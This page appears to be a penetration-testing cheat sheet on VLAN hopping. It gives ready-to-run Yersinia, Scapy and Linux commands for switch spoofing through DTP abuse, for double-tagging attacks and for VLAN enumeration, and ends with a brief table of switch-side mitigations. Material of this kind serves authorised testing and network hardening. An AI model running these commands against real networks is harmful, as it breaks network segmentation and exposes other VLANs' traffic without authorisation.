Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

VLAN hopping allows attacker to access traffic on other VLANs without routing. Two main techniques: switch spoofing (DTP) and double tagging.

Switch Spoofing (DTP Abuse)

Negotiate trunk port with switch via DTP.

Yersinia

yersinia dtp -attack 1 -interface eth0

Manual with Scapy

from scapy.all import *
from scapy.contrib.dtp import *

negotiate_trunk(iface="eth0")

After Trunk Established

# Create VLAN interface
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN up
dhclient eth0.TARGET_VLAN
Or manually: 
ip link add link eth0 name eth0.100 type vlan id 100
ip addr add 10.10.100.10/24 dev eth0.100
ip link set eth0.100 up
Now can reach hosts on VLAN 100.

Double Tagging

Encapsulate frame in two 802.1Q tags. Outer tag matches native VLAN, inner tag is target VLAN.
One-way only — no return traffic. Useful for blind attacks (e.g., injecting into target VLAN).

Scapy

from scapy.all import *

packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(packet, iface="eth0")

Requirements

  • Attacker on native VLAN (untagged)
  • Switch doesn’t strip outer tag before forwarding
  • Target VLAN known

VLAN Enumeration

Wireshark

vlan
Look for 802.1Q tagged frames to identify VLANs.

Nmap

nmap --script=broadcast-listener -e eth0

CDP/LLDP

tcpdump -i eth0 -nn -v 'ether proto 0x88cc'   # LLDP
yersinia cdp -attack 0 -interface eth0          # CDP sniff

Mitigation

DefenseDescription
Disable DTPswitchport nonegotiate
Access modeswitchport mode access on all ports
Native VLANChange from VLAN 1 to unused VLAN
VLAN pruningOnly allow needed VLANs on trunks

Quick Reference

AttackMethod
DTP abuseyersinia dtp -attack 1 → negotiate trunk
Access VLANvconfig add eth0 VLAN_ID after trunk
Double tagScapy: Dot1Q(native)/Dot1Q(target) — one-way only
EnumerateWireshark vlan filter, CDP/LLDP sniff